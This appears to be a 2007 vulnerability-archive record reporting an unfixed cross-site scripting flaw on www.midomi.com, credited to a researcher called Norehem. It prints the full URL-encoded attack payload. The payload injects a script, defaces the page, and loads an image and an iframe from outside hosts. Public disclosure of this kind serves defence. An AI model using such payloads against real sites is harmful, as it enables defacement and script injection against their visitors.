Security researcher Norehem, has submitted on 08/08/2007 a cross-site-scripting (XSS) vulnerability affecting www.midomi.com, which at the time of submission ranked 24660 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/08/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 08/08/2007 |
Date published: 09/08/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Norehem |
Domain: www.midomi.com |
Category: XSS |
Pagerank: 24660 |
URL: http://www.midomi.com/index.php?action=main.search&type=text&searchTerm=%3E%22%3E%3Ctitle%3ENorehem+ was+here%3C%2Ftitle%3E%3CSCRIPT%3Ealert%28%27Norehem+WaS+HeRe%21%21%27%29%3C%2FSCRIPT%3E%3CH1%3E%3CH 1%3E%3CH1%3E%3Cmarquee%3ENorehem+was+here%3C%2Fmarquee%3E%3C%2FH1%3E%3C%2FH1%3E%3C%2FH1%3E%3CCENTER% 3E%3CIMG+SRC%3D%22http%3A%2F%2Fwww.cibernautica.com%2Fforocibernautica%2Fupload%2Fnorehemzu4.gif%22% 3E%3C%2FCENTER%3E%3Ciframe+src%3Dhttp%3A%2F%2Fjersain.iespana.es%2Fxss.html+%3C |
Click here to view the mirror
|
|
|